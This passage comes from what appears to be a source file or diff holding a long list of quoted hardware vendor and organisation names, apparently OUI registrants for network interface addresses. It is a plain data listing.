Sicherheitssysteme GmbH", + "Brand Maker Enabler Inc.", + "SZ Knowact Robot Technology Co., Ltd", + "United Automotive Electronic Systems Co.,Ltd.", + "Control Accessories LLC", + "Vivibit Inc", + "Packet Clearing House", + "Sienda Multimedia Ltd", + "Shanghai Notion Information Technology Co., Ltd", + "Coram AI, Inc", + "Rongcheeng Goer Technology Co.,Ltd.", + "Lavelle Network Private Limited", + "Inagile Electronic Technology Co.,LTD.", + "Panasonic Ecology Systems", + "nFore Technology Co., Ltd.", + "Prolights", + "Douyin Vision Co., Ltd", + "ShenzhenEnjoyTechnologyCo.,Ltd", + "IntelPro Inc.", + "Valeo Schalter und Sensoren GmbH", + "Shenzhen Photon Leap Technology Co., Ltd.", + "DASAN Network Solutions", + "ADT Technology", + "PNetworks Electronics Information", + "Origin Co., Ltd.", + "Argo Ai, Llc", + "Zen Exim Pvt. Ltd.", + "TIBRO Corp.", + "NTX Electronics YangZhou co.,LTD", + "RPS S.p.A.", + "TenaFe Inc.", + "ShenZhen Linked-Z Intelligent Display Co., Ltd", + "Changwang Technology inc.", + "Active Brains", + "Jtekt Electronics Corporation", + "ShenZhen TianGang Micro Technology CO.LTD", + "TBS GmbH", + "Zipline International Inc.", + "Jibaiyou Technology Co.,Ltd.", + "CradlePoint, Inc", + "Jiangsu Viscore Technologies Co.,Ltd", + "Shenzhen Jaguar Microsystems Co., Ltd", + "Square Inc.", + "Richer Link Technologies CO.,LTD", + "B+L Industrial Measurements GmbH", + "BCOM Networks Limited", + "Zhongshan Camry Electronic Company Limited", + "Iethcom Information Technology Co., Ltd.", + "BELLDESIGN Inc.", + "Atom Power, Inc.", + "Evident Corporation", + "EntryPoint Networks, Inc", + "hangzhou zhiyi communication co., ltd", + "Xenon Smart Teknoloji Ltd.", + "Intracom SA Telecom Solutions", + "Arthrex Inc.", + "Yobiiq Intelligence B.V.", + "Hamamatsu Photonics K.K.", + "Franklin Electric Co., Inc.", + "duagon Germany GmbH", + "dormakaba Canada Inc. - Keyscan", + "NakaoLab, The University of Tokyo", + "Assa Abloy AB - Yale", + "Jancus", + "OuterLink Corporation", + "topsystem GmbH", + "Plenom A/S", + "Unisyue Technologies Co; LTD.", + "Auhui Taoyun Technology Co., Ltd", + "Yunhight Microelectronics", + "Nettrix Information Industry co.LTD", + "Brusa HyPower AG", + "Business-intelligence of Oriental Nations Corporation Ltd.", + "Shanghai Enflame Technology Co., Ltd.", + "Panasonic Entertainment & Communication Co., Ltd.", + "Lenovo Information Products (Shenzhen)Co.,Ltd", + "Kymeta Purchasing", + "Houwa System Design Corp.", + "Wayties, Inc.", + "LLC Elektra", + "Belden Mooresville", + "Shenzhen Visteng Technology CO.,LTD", + "Comcast-SRL", + "Shenzhen Benew Technology Co.,Ltd.", + "Bosch Security Systems B.V.", + "Meizhou Guo Wei Electronics Co., Ltd", + "Shenzhen Ideaform Industrial Product Design Co., Ltd", + "Polytron Vertrieb GmbH", + "Nile Global Inc", + "iMercury", + "NIO Co., Ltd.", + "Otto Bock Healthcare Products GmbH", + "Grt", + "Fujian Newland Auto-ID Tech Co.,Ltd.", + "KYOCERA Document Solutions Inc.", + "Guangdong Jiuzhi Technology Co.,Ltd", + "Yunjing lntelligent Technology(Dongguan).,Ltd", + "Starkoff Co., Ltd.", + "IBO Technology Co,Ltd", + "Central Denshi Seigyo", + "China Telecom Fufu Information Technology Co., Ltd.", + "BrightSign LLC", + "Wistron InforComm (Zhongshan) Corporation", + "Shenzhen Xiongxin Technology Co.,Ltd", + "Worldcns Co.,Ltd.", + "Cp Plus Gmbh & Co. Kg", + "PT Indoreka Jaya Wutama", + "B/E AEROSPACE, Inc.", + "Shenzhen Comstar .Technology Co.,Ltd", + "Virtium", + "TaiXin Semiconductor Co., Ltd", + "Shenzhen Xingguodu Technology Co., Ltd.", + "Heights Telecom T ltd", + "Shenzhen 3SNIC information technology company Limited", + "VoltServer", + "Wireless-Tek Technology Limited", + "SECO-LARM USA Inc", + "SiMa.ai", + "Mind Tech International Limited", + "Minut AB", + "Axevast Technology", + "ACES Co.,Ltd", + "Biznes Systema Telecom, LLC", + "KNS Group LLC", + "Rode", + "YanFeng Visteon(ChongQing) Automotive Electronic Co.,Ltd", + "Guangzhi Wulian Technology(Guangzhou) Co., Ltd", + "Jabil Circuit (Guangzhou) Limited", + "shenzhen kexint technology co.,ltd", + "Rivertree Networks Corp.", + "Dialogic Corporation", + "Bosch Automative products(Suzhou)Co.,Ltd Changzhou Branch", + "Shenzhen Giant Microelectronics Company Limited", + "Shenzhen Hengyi Technology Co., LTD", + "Company NA Stage & Light", + "Coyote System", + "system a.v. co., ltd.", + "Viaanix Inc", + "Japan Computer Vision Corp.", + "China Leadshine Technology Co.,Ltd", + "Synertau LLC", + "Ooo Tss", + "Nanjing Yufei Intelligent Control Technology Co.,LTD", + "Applied Intelligent Systems, Inc.", + "Diskbank, Inc.", + "Kingsignal Technology Co., Ltd.", + "NambooSolution", + "Start Usa, Inc.", + "Shenzhen Wewins Wireless Co., ltd", + "Pocketbook International SA", + "SteelSeries ApS", + "JSC RPC Istok named after Shokin", + "Avang - neterbit", + "Muli Muwai Furniture Qidong Co., Ltd", + "Radiant Industries Incorporated", + "Shenzhen 10Gtek Transceivers Co., Limited", + "Shenzhen Linghai Electronics Co.,Ltd", + "Future Internet, Inc.", + "The Things Industries B.V.", + "Duskrise inc.", + "Particle Industries Inc.", + "Shenzhen Guowei Shidai Communication Equipement Co., Ltd", + "Northern Data AG", + "Spbec-Mining Co.ltd", + "Dr. B. Struck", + "Cromemco Incorporated", + "Artek Microelectronics Co.,Ltd.", + "GeoWAN Pty Ltd", + "arkona technologies GmbH", + "UCloud Technology Co., Ltd.", + "Livesecu co., Ltd", + "Weidu Technology (Beijing) Co., Ltd.", + "Sentinum GmbH", + "Hexatronic AB", + "D-Link Middle East FZCO", + "SambaNova Systems, Inc.", + "Bern University of Applied Sciences", + "Chongqing Trantor Technology Co., Ltd.", + "uAvionix Corporation", + "Synology Incorporated", + "D-Link (Shanghai) Limited Corp.", + "Annso Co., Ltd.", + "Hangzhou Yaguan Technology Co. LTD", + "Mercury Security Corporation", + "ESYSE GmbH Embedded Systems Engineering", + "Full Solution Telecom", + "Ambiq", + "dnt Innovation GmbH", + "Freescale Semiconductor (China) Ltd.", + "Wilogy Srl", + "Quasar Cipta Mandiri, PT", + "Accelerated Concepts, Inc", + "Atop Corporation", + "SAVI Controls", + "Itus Japan Co. Ltd", + "Rail-Mil Sp. z o.o. Sp. K.", + "Drimsys,Inc", + "Beijing Tosee Technology Co., Ltd.", + "Mirka Ltd.", + "BlueBite", + "Beijing Lanxum Computer Technology CO.,LTD.", + "Kivo Technology, Inc.", + "Wistron Mexico SA de CV", + "ShenZhen Hugsun Technology Co.,Ltd.", + "Shintec Hozumi co.ltd.", + "Garo Ab", + "Chemtronics", + "Cheertek Inc.", + "Axioma Metering UAB", + "Up-Today Industrial Co., Ltd.", + "Nevro", + "Cricut Inc.", + "Shin-Il Tech", + "Asperiq", + "Linkintec Co., Ltd", + "Realfit(Shenzhen) Intelligent Technology Co., Ltd", + "Yamato Denki Co.,Ltd.", + "Logitech Hong Kong", + "Ace Technology Corp.", + "Shenzhen Jie Shi Lian Industrial Co.,LTD", + "smart light technology", + "Aura Home, Inc.", + "TeconGroup, Inc", + "Xiamen Paperang Technology Co.,Ltd.", + "Shenzhen Huaruian Technology Co.,Ltd", + "Shenzhen Lanfeng Times Industrial Co.,Ltd.", + "AUROTECH ultrasound AS.", + "Nanjing BigFish Semiconductor Co., Ltd.", + "Aerodisk Llc", + "Ruru Tek Private Limited", + "Technicolor (China) Technology Co., Ltd.", + "Fibrain", + "WiredIQ, LLC", + "Shenzhen hylitech Co.,LTD", + "nuoxc", + "i-TOP DESING TECHNOLOGY CO.,LTD", + "Kyushu Ten Co.,Ltd", + "China Telecom Corporation Limited", + "Fibocom Auto Inc.", + "shenzhen maxtopic technology co.,ltd", + "Shenzhen Americas Trading Company LLC", + "T3 Technology Co., Ltd.", + "Shenzhen Century Xinyang Technology Co., Ltd", + "BUJEON ELECTRONICS Co,.Ltd", + "Shenzhen Skyworth Wireless Technology Co.,Ltd", + "Beijing Leadsec Technology Co., Ltd.", + "Huizhou City Sunsin lntelligent Technology Co.,Ltd", + "Shaoxing ShunChuang Technology CO.,LTD", + "Arra Networks/ Spectramesh", + "E-T-A Circuit Breakers Ltd", + "Biwin Semiconductor (HK) Company Limted", + "Sadel S.p.A.", + "Shenzhen Gongjin Electronics Co.,Ltd", + "Chenbro Micom Co., Ltd.", + "Gesellschaft für Sonder-EDV-Anlagen mbH", + "Sunwoda Electronic Co.,Ltd", + "ENENSYS Technologies", + "Yuanfudao Hk Limted", + "Tadpole Technology Plc", + "iRay Technology Company Limited", + "Jovision Technology Co., Ltd.", + "Hong Kong AMobile Intelligent Corp. Limited Taiwan Branch", + "KETEK GmbH", + "Matrix Design Group, LLC", + "Api-K", + "ChongQing Lavid Technology Co., Ltd.", + "Amec", + "Data Robotics, Incorporated", + "Binxin Technology(Zhejiang) Ltd.", + "Digital 14", + "Truebeyond Co., Ltd", + "Nanjing Juplink Intelligent Technologies Co., Ltd.", + "Tessolve Semiconductor Private Limited", + "Proxis, spol. s r.o.", + "Blink by Amazon", + "Quantumsolution", + "Beijing Supvan Information Technology Co.,Ltd.", + "Shenzhen Huachuang Shidai Technologyco.,Ltd", + "Flextronics Computing(Suzhou)Co.,Ltd.", + "VSST Co., LTD", + "Vence Corp", + "Qudelix, Inc.", + "Kyowa Electronics Co.,Ltd.", + "WowWee Ltd.", + "CMS Electracom", + "Miromico AG", + "ASR Microelectronics (Shanghai) Co., Ltd.", + "Sailer Electronic Co., Ltd", + "Smart Code(shenzhen)Technology Co.,Ltd", + "Ulrich Lippert GmbH & Co KG", + "Shenzhen Broadtel Telecom Co.,Ltd", + "Jiangsu Hengtong Terahertz Technology Co., Ltd.", + "Zhuolian (Shenzhen) Communication Co., Ltd", + "CommFront Communications Pte Ltd", + "Nanjing Kechen Electric Co., Ltd.", + "Khwahish Technologies Private Limited", + "IoT Company Solucoes Tecnologicas Ltda", + "WELL Communication Corp.", + "Trusonus corp.", + "Sangfor Technologies Inc.", + "Luminar Technologies", + "Shishi Tongyun Technology(Chengdu)Co.,Ltd.", + "amnimo Inc.", + "Beijing DoSee Science and Technology Co., Ltd.", + "Beijing Microvision Technology Co.,Ltd", + "XADA Technologies", + "Suzhou Aquila Solutions Inc.", + "Technica Engineering GmbH", + "Gint", + "Shenzhen XGTEC Technology Co,.Ltd.", + "Shenzhen HongRui Optical Technology Co., Ltd.", + "Autoit", + "Shenzhenshi Xinzhongxin Co., Ltd", + "Xslent Energy Technologies. LLC", + "Samsara Networks Inc", + "SHEN ZHEN NUO XIN CHENG TECHNOLOGY co., Ltd.", + "Beijing Iactive Network Co.,Ltd", + "Xiamen Yudian Automation Technology Co., Ltd", + "BHR Tech GmbH", + "Xos", + "Guangzhou Aoshi Electronic Co.,Ltd", + "Creative Chips GmbH", + "IoT Diagnostics", + "Wuhan GreeNet Information Service Co.,Ltd.", + "Groupe Atlantic", + "Shanghai Reacheng Communication Technology Co.,Ltd", + "EmBestor Technology Inc.", + "Algorab S.r.l.", + "ABB SpA - DIN Rail", + "SG Wireless Limited", + "Shenyang Vibrotech Instruments Inc.", + "Xtreme Power Systems", + "Levven Electronics Ltd.", + "HYESUNG TECHWIN Co., Ltd", + "Nordic Semiconductor ASA", + "Honeywell Safety Products (Shanghai) Co.,Ltd", + "NIIC Technology Co., Ltd.", + "Vanu Inc.", + "EmbedWay Technologies", + "Decimator Design", + "CIMCON Lighting Inc.", + "Arab International Optronics", + "Handreamnet", + "Guangzhou Dawei Communication Co.,Ltd", + "Voippartners", + "Holoplot GmbH", + "Lindsay Broadband Inc", + "John Deere Electronic Solutions", + "Piranti", + "China TransInfo Technology Co., Ltd", + "Atls Altec", + "Zhejiang Hechuan Technology Co., Ltd.", + "Algorithmics Ltd.", + "Gte Spacenet", + "ABB Robotics", + "THUB Co., ltd.", + "Flonidan A/S", + "Ionix Inc.", + "Westermo Network Technologies AB", + "HDV Phoelectron Technology Limited", + "Petite-En", + "Dragonchip Limited", + "Bxb Electronics Co., Ltd", + "SHENZHEN Coolkit Technology CO.,LTD", + "NL Ministry of Defense", + "Shenzhen Siera Technology Ltd", + "BISSELL Homecare, Inc.", + "Electrolux", + "CAS Corp.", + "RoboTech srl", + "ePipe Pty. Ltd.", + "Guangdong Asano Technology CO.,Ltd.", + "NEO Monitors AS", + "Benchmark Storage Innovations", + "Prusa Research s.r.o.", + "Shenzhen Decnta Technology Co.,LTD.", + "Avelon", + "Molekule", + "Cern", + "Intercept Services Limited", + "E-Domus International Limited", + "LHP Telematics LLC", + "Dialog Semiconductor", + "Panasonic India Private limited", + "Diehl Metering GmbH", + "Chunghua Intelligent Network Equipment Inc.", + "Lars", + "Vivint Smart Home", + "Wireless CCTV Ltd", + "Suzhou SmartChip Semiconductor Co., LTD", + "Koss Corporation", + "Nanchang BlackShark Co.,Ltd.", + "NXP France Semiconductors France", + "Shenzhen mantunsci co., LTD", + "Enernet", + "Guangdong UNIPOE IoT Technology Co.,Ltd.", + "Cloud Light Technology Limited", + "Beijing Wanwei Intelligent Technology Co., Ltd.", + "Xintai Automobile Intelligent Network Technology", + "Veroguard Systems Pty Ltd", + "Beijing Broadwit Technology Co., Ltd.", + "Beckwith Electric Co.", + "Explora Technologies Inc", + "Sound United LLC", + "SAE Technologies Development(Dongguan) Co., Ltd.", + "Oy Everon Ab", + "Gosuncn Technology Group Co., Ltd.", + "5VT Technologies,Taiwan LTd.", + "PsiKick, Inc.", + "Drtech", + "SONY Visual Products Inc.", + "Spotify USA Inc.", + "Smarto", + "Groupe Ldlc", + "Shenzhen Smart Device Technology Co., LTD.", + "Shandong USR IOT Technology Limited", + "Aisai Communication Technology Co., Ltd.", + "Axiohm Sas", + "Nec Unified Solutions Nederland B.v.", + "Guangdong Donyan Network Technologies Co.,Ltd.", + "GuoTengShengHua Electronics LTD.", + "ETH Zurich", + "Shenzhen Zhibotong Electronics Co.,Ltd", + "Common Networks", + "tcloud intelligence", + "ilumisys Inc. DBA Toggled", + "Systemonic AG", + "IPmotion GmbH", + "Shenzhen Huisheng Information Technology Co., Ltd.", + "EthoSwitch LLC", + "Neuralink Corp.", + "Sullair Corporation", + "Shenzhen Tian Kun Technology Co.,LTD.", + "WBS Technology", + "Usys Co.,Ltd.", + "GIRD Systems Inc", + "Merging Technologies SA", + "exands", + "Irts", + "MKT Systemtechnik GmbH & Co. KG", + "ImesD Electronica S.L.", + "Chamberlain Access Solutions", + "PixArt Imaging Inc.", + "Hitachi Metals, Ltd.", + "RF Industries", + "Nanjing Bestway Automation System Co., Ltd", + "Digibras Industria Do Brasils/A", + "UGENE SOLUTION inc.", + "Orion Diagnostica Oy", + "Matis", + "Manhattan TV Ltd", + "PoeWit Inc", + "AMERGINT Technologies", + "Independent Technologies", + "Webasto SE", + "Hengstler GmbH", + "Pingtek Co., Ltd.", + "Shenzhen New Species Technology Co., Ltd.", + "Innowireless / QUCELL Networks", + "EASY3CALL Technology Limited", + "Flovel Co., Ltd.", + "Yuduan Mobile Co., Ltd.", + "Telstra", + "Meta-Networks, LLC", + "Nocsys", + "ORFEO SOUNDWORKS Inc.", + "OURA Health Oy", + "ELS-GmbH & Co. KG", + "DragonWave Inc.", + "CommerceGuard AB", + "Arduino Ag", + "MicroSys Electronics GmbH", + "Shanghai Visking Digital Technology Co. LTD", + "EtherCAT Technology Group", + "Beacon Inc", + "Bowers & Wilkins", + "Fisys", + "Beijing Loveair Science and Technology Co. Ltd.", + "ffly4u", + "Secure Systems & Services", + "Datang Gohighsec(zhejiang)Information Technology Co.,Ltd.", + "Smnd", + "Vodia Networks Inc", + "Look Easy International Limited", + "Skylab M&C Technology Co.,Ltd", + "Guangdong Homecare Technology Co.,Ltd.", + "Guizhou Fortuneship Technology Co., Ltd", + "Acer Computer(Shanghai) Limited.", + "Ou Wei Technology Co.,Ltd. of Shenzhen City", + "Hangzhou Lowan Information Technology Co., Ltd.", + "Shanghai Fangzhiwei Information Technology CO.,Ltd.", + "Swaive Corporation", + "Hana CNS Co., LTD.", + "Hangzhou Bianfeng Networking Technology Co., Ltd.", + "Unisem", + "Pointmobile", + "FormericaOE", + "Ace Axis Limited", + "Skipper As", + "Decision Europe", + "Beijing Huacan Electronics Co., Ltd", + "APC by Schneider Electric", + "Angie Hospitality LLC", + "Mayfield Robotics", + "Sense Labs, Inc.", + "Synapticon GmbH", + "mirusystems CO.,LTD", + "VDII Innovation AB", + "S Mobile Devices Limited", + "Shenzhen WayOS Technology Crop., Ltd.", + "Shenzhen Bus-Lan Technology Co., Ltd.", + "DME Micro", + "Limidea Concept Pte. Ltd.", + "Harting K.k.", + "Kioxia Corporation", + "ALL BEST Industrial Co., Ltd.", + "Sound ID Inc.", + "Inim Electronics S.r.l.", + "Onface", + "ShenZhen TIGO Semiconductor Co., Ltd.", + "seca gmbh & co. kg", + "EAL (Apeldoorn) B.V.", + "Gematica Srl", + "Torian Wireless", + "Beijing Nebula Link Technology Co., Ltd", + "Quantum Networks (SG) Pte. Ltd.", + "Ufine Technologies Co.,Ltd.", + "Marketech International Corp.", + "Jibo, Inc.", + "Kummler+Matter AG", + "L&N Technologies", + "Vantanol Industrial Corporation", + "Power Electronics International Inc.", + "Nimble Microsystems, Inc.", + "Shenzhen CYX Technology Co., Ltd.", + "Helvetia INC.", + "Lanix Internacional, S.A. de C.V.", + "KT&C Co., Ltd.", + "Armorlink Co .Ltd", + "Huami Information Technology Co.,Ltd.", + "Nectarsoft Co., Ltd.", + "Markov Corporation", + "Tianjin Huisun Technology Co.,Ltd.", + "Fibergate Inc.", + "Racal Instruments", + "ESPOD Ltd.", + "Sawwave", + "ivvi Scientific(Nanchang)Co.Ltd", + "CeLa Link Corporation", + "Control Concepts, Inc.", + "Zoom Server", + "Nagano Keiki Co., Ltd.", + "Krohne", + "Sygn House Inc.", + "WINSTAR Display CO.,Ltd", + "AlphaTech PLC Int’l Co., Ltd.", + "Shenzhen Xinfa Electronic Co.,ltd", + "Megabyte Ltd.", + "Dps, Inc.", + "Landauer, Inc.", + "Night Owl SP", + "Glodio Technolies Co.,Ltd Tianjin Branch", + "StreamUnlimited Engineering GmbH", + "Galea Network Security", + "Microtel Innovation S.r.l.", + "Teladin Co.,Ltd.", + "Gimasi Sa", + "Becon Technologies Co,.Ltd.", + "Jigowatts Inc.", + "unGlue, Inc", + "Gridwiz Inc.", + "Verkada Inc", + "Transmeta Corp.", + "Tsingtong Technologies Co, Ltd.", + "SAM Electronics GmbH", + "U.I. Lapp GmbH", + "Shanghai Joindata Technology Co.,Ltd.", + "Shaanxi GuoLian Digital TV Technology Co.,Ltd.", + "Solid Optics B.V.", + "Arbiter Systems, Inc.", + "Lesira Manufacturing Pty Ltd", + "Shenzhen Minew Technologies Co., Ltd.", + "Ransnet Singapore Pte Ltd", + "Clack Corporation", + "Chanson Water Co., Ltd.", + "Shannon Systems", + "Ying Hua Information Technology (Shanghai)Co., LTD", + "Zentan", + "Digitron da Amazonia S/A", + "Cvt Co.,Ltd", + "neXus ID Solutions AB", + "MRS Electronic GmbH", + "AQ Corporation", + "Raybased AB", + "Vivalnk", + "Salcomp (Shenzhen) CO., LTD.", + "Li Seng Technology Ltd", + "Kinova", + "Magicard Ltd", + "lemonbeat GmbH", + "Domino UK Ltd", + "Beijing LasNubes Technology Co., Ltd.", + "Pulzze Systems, Inc", + "Canary Connect, Inc.", + "PTCOM Technology", + "ESTIC Corporation", + "Phoebe Micro Inc.", + "Snuza International Pty. Ltd.", + "Veo", + "Westech Korea Inc.,", + "PayRange Inc.", + "Dwb Associates", + "NHN Entertainment", + "Pavilion Data Systems Inc", + "Beijing Baofengmojing Technologies Co., Ltd", + "Chongqing Miedu Technology Co., Ltd.", + "NetAlly", + "Panasonic India Pvt. Ltd.", + "Wi2Wi, Inc", + "Dmobile System Co., Ltd.", + "Shenzhen Longtech Electronics Co.,Ltd", + "AccelStor, Inc.", + "Uniden Corporation", + "Revolution Display", + "AudioControl Inc.", + "Invivo Research Inc.", + "Guangdong Pisen Electronics Co.,Ltd", + "HighSpeed Surfing Inc.", + "CANDY HOUSE, Inc.", + "Shenzhen Yifang Digital Technology Co.,Ltd.", + "HW Communications Ltd", + "Shenzhen ChipTrip Technology Co,Ltd", + "Sisnet Co., Ltd", + "Jeelan (Shanghai Jeelan Technology Information Inc", + "Guangzhou Juan Optical and Electronical Tech Joint Stock Co., Ltd", + "Jiangsu Houge Technology Corp.", + "Zebra Information Tech Co. Ltd", + "Measy Electronics Co., Ltd.", + "Ubiquam Co., Ltd.", + "Aeta Audio Systems", + "Techsan Electronics Co., Ltd.", + "UTStarcom Inc", + "United Telecoms Ltd", + "Teraspek Technologies Co.,Ltd", + "Intelligent Steward Co.,Ltd", + "Shandong Kaer Electric.co.,Ltd", + "Lanoptics, Ltd.", + "Consolidated Resource Imaging", + "Shanghai XZ-COM.CO.,Ltd.", + "OttoQ", + "Vivo International Corporation Pty Ltd", + "Gogoro Taiwan Limited", + "Shenzhen Yihao Hulian Science and Technology Co., Ltd.", + "Logicom Sa", + "Scalys", + "WiZ IoT Company Limited", + "Octopod Technology Co. Ltd.", + "Transcend Information", + "LaonPeople", + "Hangzhou Zero Zero Technology Co., Ltd.", + "Breathometer, Inc.", + "DataCore Software Corporation", + "Tigi Corporation", + "Appel Elektronik GmbH", + "Derek(Shaoguan)Limited", + "Vimar Spa", + "Guoguang Electric Co.,Ltd", + "Surfilter Network Technology Co., Ltd.", + "SimonsVoss Technologies GmbH", + "Kaminario, Ltd.", + "Sonifex Ltd.", + "Automation Components, Inc", + "Transware", + "Lookit Technology Co., Ltd", + "Not for Radio, LLC", + "Brilliantts Co., Ltd", + "Borqs Beijing Ltd.", + "shanghai huayuan chuangxin software CO., LTD.", + "TCPlink", + "Azroad Technology Company Limited", + "Shanghai Linguo Technology Co., Ltd.", + "Unigen DataStorage Corporation", + "Green Electronics", + "Topview Optronics Corp.", + "Cobs Ab", + "Honeywell Life Safety", + "Goldcard High-Tech Co.,Ltd.", + "DataFab Systems Inc.", + "Darfon Lighting Corp", + "Vanguard Security Engineering Corp.", + "Neosfar", + "Century Opticomm Co.,Ltd", + "Inno S", + "Canal +", + "Syntech(Hk) Technology Limited", + "Aisino Corporation", + "Shenzhen Vastking Electronic Co.,Ltd.", + "Technobox, Inc.", + "Lily Robotics", + "Ctr Srl", + "Shaw Communications Inc.", + "Lattice Semiconductor Corp. (LPA)", + "SUSE Linux GmbH", + "Cognitec Systems GmbH", + "Shenzhen ViewAt Technology Co.,Ltd.", + "Everest Networks, Inc", + "E-TRON Co.,Ltd.", + "OMX Technology - FZE", + "FreeBit Co., Ltd.", + "Savvius", + "SourcingOverseas Co. Ltd", + "Sysorex Global Holdings", + "WORLD MEDIA AND TECHNOLOGY Corp.", + "ATP Electronics, Inc.", + "Huizhou City Huiyang District Meisiqi Industry Development Co,.Ltd", + "DAIHAN Scientific Co., Ltd.", + "QLove Mobile Intelligence Information Technology (W.H.) Co. Ltd.", + "EXTEN Technologies, Inc.", + "Hangzhou Xueji Technology Co., Ltd.", + "Silkan Sa", + "Googol Technology (HK) Limited", + "Auth-Servers, Llc", + "Wuxi iData Technology Company Ltd.", + "Axiim", + "Hunan Topview Network System CO.,LTD", + "Kamama", + "MINIX Technology Limited", + "Linktel Technologies Co.,Ltd", + "Zhejiang Everbright Communication Equip. Co,. Ltd", + "T&W Electronics Company", + "iKuai Networks", + "Siselectron Technology LTD.", + "Skybell, Inc", + "Champion Optical Network Engineering, LLC", + "Atomic Rules LLC", + "Liverock technologies,INC", + "RF elements s.r.o.", + "Foctek Photonics, Inc.", + "Leonton Technologies", + "ZPE Systems, Inc.", + "SPON Communication Technology Co.,Ltd", + "Formlabs", + "Shenzhen Meione Technology CO., LTD", + "Jiangxi Hongpai Technology Co., Ltd.", + "Shenzhen Prifox Innovation Technology Co., Ltd.", + "CarePredict, Inc.", + "Electrocompaniet A.S.", + "Petra Systems", + "Intercel Group Limited", + "Polyera", + "Liuhe Intelligence Technology Ltd.", + "Chengdu InnoThings Technology Co., Ltd.", + "Hongkong Ucloudlink Network Technology Limited", + "RBcloudtech", + "Wafa Technologies Co., Ltd.", + "Rawe Electonic GmbH", + "Trinus Systems Inc.", + "IAdea Corporation", + "Ge Ruili Intelligent Technology ( Beijing ) Co., Ltd.", + "Chuango Security Technology Corporation", + "Dalian Seasky Automation Co;Ltd", + "Bosung Electronics Co., Ltd.", + "Network Instruments", + "Zodiac Aerospace Sas", + "Avi-On Labs", + "Oilfind International LLC", + "Starcor Beijing Co.,Limited", + "Leading Public Performance Co., Ltd.", + "Huizhou Qiaoxing Electronics Technology Co., Ltd.", + "USA 111 Inc", + "Antex Electronic Corp.", + "Top-Access Electronics Co Ltd", + "Diamanti", + "Shanghai Kaixiang Info Tech LTD", + "Zappware", + "Vodafone Omnitel B.V.", + "Xtel Wireless ApS", + "Creative Next Design", + "Shenzhen Webridge Technology Co.,Ltd", + "TableTop Media (dba Ziosk)", + "Biosoundlab Co., Ltd.", + "K's Co.,Ltd.", + "Dictum Health, Inc.", + "Phytrex Technology Corp.", + "Shenzhen Jinkeyi Communication Co., Ltd.", + "Malvern Instruments Ltd", + "Topwell International Holdings Limited", + "iway AG", + "Metamako", + "Hongkong Ragentek Communication Technology Co.,Limited", + "B&B Exporting Limited", + "Techroutes Network Pvt Ltd", + "CELOT Wireless Co., Ltd", + "MCNEX Co.,Ltd.", + "Techman Electronics (Changshu) Co., Ltd.", + "Syntech (Hk) Technology Limited", + "SKG Electric Group(Thailand) Co., Ltd.", + "Gehirn Inc.", + "AMG Systems Ltd.", + "Kerlink", + "Quanzhou TDX Electronics Co., Ltd", + "amazipoint technology Ltd.", + "Octonion SA", + "Julong Co,.Ltd.", + "Wiatec International Ltd.", + "Shen Zhen Shi Jin Hua Tai Electronics Co.,Ltd", + "Vitsmo Co., Ltd.", + "Neterix Ltd", + "Drogoo Technology Co., Ltd.", + "Family Zone Cyber Safety Ltd", + "Firefly Integrations", + "Vizmonet Pte Ltd", + "Vixtel Technologies Limted", + "Socionext Inc.", + "Sayme Wireless Sensor Network", + "Hangzhou Sunrise Technology Co., Ltd", + "Eadingcore Intelligent Technology Co., Ltd.", + "Beijing Thought Science Co.,Ltd.", + "Cilag GmbH International", + "Ultimaker B.V.", + "DK Networks", + "Inpeco SA", + "Heimi Network Technology Co., Ltd.", + "Netonix", + "Shanghai Genvision Industries Co.,Ltd", + "Actility", + "Bitel Co., Ltd.", + "HongKong Ipro Technology Co., Limited", + "Richfit Information Technology Co., Ltd", + "ATN International Limited", + "Beijing Nan Bao Technology Co., Ltd.", + "Kaiam Corporation", + "HMS Industrial Networks SLU", + "Getck Technology, Inc", + "Seeed Technology Inc.", + "Korins Inc.", + "BIOS Corporation", + "The Sapling Company", + "METEL s.r.o.", + "3isysnetworks", + "OnePlus Tech (Shenzhen) Ltd", + "Mopria Alliance", + "TrendPoint Systems", + "Burg-Wächter Kg", + "Higher Way Electronic Co., Ltd.", + "Lava International Ltd.", + "Maxwell Forest", + "NEXPA System", + "Boosty", + "SEMOCON Co., Ltd", + "Avizia", + "Beijing Huafei Technology Co., Ltd.", + "shenzhen yunmao information technologies co., ltd", + "Planet Networks", + "Allis Communications", + "Shenzhen Linghangyuan Digital Technology Co.,Ltd.", + "Shanghai Xinyou Information Technology Ltd. Co.", + "Technische Alternative GmbH", + "Telvent", + "GLOBO Multimedia Sp. z o.o. Sp.k.", + "3D Display Technologies Co., Ltd.", + "Shanghai Sango Network Technology Co.,Ltd", + "SiboTech Automation Co., Ltd.", + "Fujian Great Power PLC Equipment Co.,Ltd", + "Netmoon Technology Co., Ltd", + "Quirky, Inc.", + "Thread Technology Co., Ltd", + "Messcomp Datentechnik GmbH", + "DZG Metering GmbH", + "Astronics Custom Control Concepts", + "Suzhou Chi-tek information technology Co., Ltd", + "Savitech Corp.", + "Dalian Hi-Think Computer Technology, Corp", + "Metis Communication Co.,Ltd", + "OOO NPP Systemotechnika-NN", + "Shenzhen Sanland Electronic Co., ltd.", + "TrekStor GmbH", + "BlueN", + "Chloride S.r.L", + "Werma Signaltechnik GmbH & Co. KG", + "Hubbell Power Systems, Inc.", + "Morio Denki Co., Ltd.", + "Yong Tai Electronic (Dongguan) Ltd.", + "Impex-Sat GmbH&Co KG", + "Experimental Factory of Scientific Engineering and Special Design Department", + "Vapor Stone Rail Systems", + "ShenZhen Apexis Electronic Co.,Ltd", + "ELCOM Innovations Private Limited", + "Hyundai ESG", + "KyungDong One Co., Ltd.", + "Innovolt", + "Cera Electronique", + "Blu Tether Limited", + "Sorter Sp. j. Konrad Grzeszczyk MichaA, Ziomek", + "MESOMATIC GmbH & Co.KG", + "Tvip", + "AES motomation", + "Intelligent Optical Network High Tech CO.,LTD.", + "LzLabs GmbH", + "RDA Technologies Ltd.", + "Stage One International Co., Ltd.", + "Taian Technology(Wuxi) Co.,Ltd.", + "HI Solutions, Inc.", + "Suntech International Ltd.", + "s.m.s smart microwave sensors GmbH", + "IC Nexus Co. Ltd.", + "ISAAC Instruments", + "Trans Electric Co., Ltd.", + "Shenzhen Minicreate Technology Co.,Ltd", + "JIANGSU HENGSION ELECTRONIC S and T CO.,LTD", + "RNET Technologies, Inc.", + "StarTech.com", + "Toy's Myth Inc.", + "Powercode", + "Energy Imports Ltd", + "BALMUDA Inc.", + "Techboard Srl", + "Homa B.v.", + "Contec GmbH", + "Meiko Maschinenbau GmbH & Co. KG", + "Objetivos y Sevicios de Valor Añadido", + "FreeBSD Foundation", + 